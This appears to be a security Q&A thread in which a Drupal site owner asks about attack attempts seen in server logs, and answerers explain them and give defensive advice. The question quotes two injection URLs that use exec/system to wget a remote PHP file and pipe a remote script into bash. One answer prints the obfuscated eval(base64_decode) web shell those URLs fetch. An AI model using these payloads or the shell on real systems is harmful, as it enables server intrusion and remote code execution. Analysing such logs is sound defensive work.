3

In my logs I see regular attempts, a few times a day like these ones:

http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP
http://www.example.com/user/password/?name[%23post_render][]=system&name[%23markup]=wget+-O-+http://repo-linux.com/apply_patch.sh%7Cbash&name[%23type]=markup

My Drupal is patched to the latest version. Shall I worry about it? Is there something I could do to protect better?

Anders
  • 64,406
  • 24
  • 178
  • 215
MMT
  • 97
  • 5

2 Answers2

0

I did some searching, and the closest thing I can find to what’s going on is outlined here. However, I don’t think that’s quite the same. It looks like your attacker is attempting to do command injections, one of which is pulling from pastebin, the other from GitHub. Seeing the sources that the attacker is attempting to include may give you a better idea as to what’s their trying to exploit, but keep in mind that is malicious code. Visit and investigate at your own risk taking proper precautions.

I don’t know how drupal works at its core, but I would hope that a GET request like what the attacker is using (since the parameters are in the URL) wouldn’t be capable of making any changes the attacker is trying to implement.

I would recommend looking through some system logs to ensure that there was no access to the server, and ensure that not only the CMS (Drupal) is up to date, but all of the plugins, and themes as well. If you do some searching around, you may find that even an up to date plugin may have vulnerabilities.

SuperAdmin
  • 320
  • 1
  • 11
0

Looks like the attacker tries to download the script from this website (https://pastebin.com/raw/PeBdUg98) to your server:

This is the script (it's safe to click this link) :

<?php
    $st = 'return value';
    $cap='bas'.'e6'.'4_d'.'ec'.'ode';
    $c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\''; // c = 'eval(bases64_decode('
    if(isset($_POST['uf']) && isset($_POST['pr'])) {  
        $arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);  
        array_walk($arr, strval($_POST['pr']), '');        
    }
?>

And in the second call (to this script - it's safe to click the link) he tries to run a patch on your drupal.

I don't think that he can get it to work - but you can mimic what he's doing on a dummy website that you'll spin and see if it actually works.

You can check your access logs and if all the calls come from the same IP block it and do a reverse IP lookup to try and find more information about the attacker, possibly report him to his ISP.

Even though it's not phishing you can also try and submit a report here: http://www.google.com/safebrowsing/report_phish/

Good job on staying on the latest version of Drupal - if you've installed plugins try to stay on their latest version as well.

Nir Alfasi
  • 136
  • 7
  • Thank you for your answer. I have already checked and the ips are different every time. I wanted to block the ip as well. I also believe it's quite easy to fake an ip... – MMT Apr 22 '18 at 15:43
  • Thank you for your answer.It is very helpful! Especially having posted the attacker's script.I haven't tried the link on my website (with all the additional URL of the attacker) so that he does not see my ip address in his logs. In my logs, his access throws an error, however I dn't know what he gets as an output(maybe before the error is thrown), whether he gets something. To test it I need to create another website where to place the script as the attacker right? and then apply the complex URL on my main site right? – MMT Apr 22 '18 at 15:51
  • The links that I posted are safe to click: they access his script indirectly thru a site called anonymouse. And as for your question, you can spin a local drupal instance (maybe even on a VM). The use the same URL just replace the beginning (your domain) with 'localhost' and view this instance's log. Do not try to run or access these scripts thru your website. – Nir Alfasi Apr 22 '18 at 21:53